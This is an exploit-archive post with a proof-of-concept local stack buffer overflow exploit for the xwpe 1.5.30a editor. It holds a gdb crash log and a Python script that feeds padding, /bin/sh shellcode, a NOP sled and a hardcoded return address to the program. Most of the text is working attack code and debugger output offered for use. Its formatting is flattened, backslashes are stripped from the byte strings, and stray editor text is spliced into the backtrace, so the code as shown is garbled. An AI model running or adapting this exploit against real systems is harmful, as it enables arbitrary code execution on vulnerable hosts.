xwpe 1.5.30a-2.1 Buffer Overflow
Posted on 21 January 2016
# Exploit Author: Juan Sacco - http://www.exploitpack.com < jsacco@exploitpack.com> # Program: xwpe - Windows Editor v1.5.30a-2.1 # Description: Programming environment and editor for console and X11 # Tested and developed on: Kali Linux 2.0 x86 - https://www.kali.org # # Description: xwpe v1.5.30a-2.1 and prior is prone to a stack-based buffer # overflow vulnerability because the application fails to perform adequate # boundary-checks on user-supplied input. # # An attacker could exploit this issue to execute arbitrary code in the # context of the application. Failed exploit attempts will result in a # denial-of-service condition. # # Vendor homepage: http://www.identicalsoftware.com/xwpe # Kali Linux 2.0 package: pool/main/x/xwpe/xwpe_1.5.30a-2.1_i386.deb # MD5: 793a89f7df892c7934be6c2353a6f0f9 # #gdb$ run $(python -c 'print "x90" * 290 + "DCBA"') #Starting program: /usr/bin/xwe $(python -c 'print "x90" * 290 + "DCBA"') #sh: 1: /usr/sbin/gpm: not found # # ESI: 0x41414141 EDI: 0x41414141 EBP: 0x41414141 ESP: 0xBFFFF370 EIP: 0x42434441 # CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007BError while running hook_stop: #Cannot access memory at address 0x42434441 #0x42434441 in ?? () #gdb$ backtrace #0 0x42434441 in ?? () #1 0x4f4e2041 in ?? () #2 0x61732054 in ?? () #3 0x21646576 in ?? () #4 0x206f440a in ?? () #5 0x20756f79 in ?? () #6 0x746e6177 in ?? () #7 0x206f7420 in ?? () #8 0x65766173 in ?? () #9 0x6c694620 in ?? () #10 0x003f2065 in ?? () #11 0x00000088 in ?? () #12 0x00000132 in ?? () #13 0x00000006 in ?? () #14 0x00002710 in ?? () #15 0x0000009a in ?? () #16 0xfac9bc00 in ?? () #17 0x00000098 in ?? () #18 0x00000011 in ?? () #19 0xb7f783d9 in _nc_wgetch () from /lib/i386-linux-gnu/libncurses.so.5 #20 0xb7f79162 in wgetch () from /lib/i386-linux-gnu/libncurses.so.5 #21 0x0809927d in ?? () #22 0x0806b23c in ?? () #23 0x08055c78 in ?? () #24 0x080565b5 in ?? ()iles ESC-F3 Close W. F4 Search ^L S.Again ESC-X Quit #25 0x080574aa in ?? () #26 0x0804b8b8 in ?? () #27 0xb7ddca63 in __libc_start_main (main=0x804b570, argc=0x2, argv=0xbffff664, init=0x809a060, fini=0x809a050, rtld_fini=0xb7fedc90 <_dl_fini>, stack_end=0xbffff65c) at libc-start.c:287 #28 0x08049ea1 in ?? () import os,subprocess def run(): try: print "# xwpe Buffer Overflow by Juan Sacco" print "# It's AGAIN Fuzzing time on unusable exploits" print "# This exploit is for educational purposes only" # JUNK + SHELLCODE + NOPS + EIP junk = "x41"*262 shellcode = "x31xc0x50x68//shx68/binx89xe3x50x53x89xe1x99 xb0x0bxcdx80" nops = "x90"*124 eip = "x50xd1xffxbf" subprocess.call(["xwpe",' ', junk + shellcode + nops + eip]) except OSError as e: if e.errno == os.errno.ENOENT: print "Sorry, xwpe not found!" else: print "Error executing exploit" raise def howtousage(): print "Snap! Something went wrong" sys.exit(-1) if __name__ == '__main__': try: print "Exploit xWPE Local Overflow Exploit" print "Author: Juan Sacco" except IndexError: howtousage() run()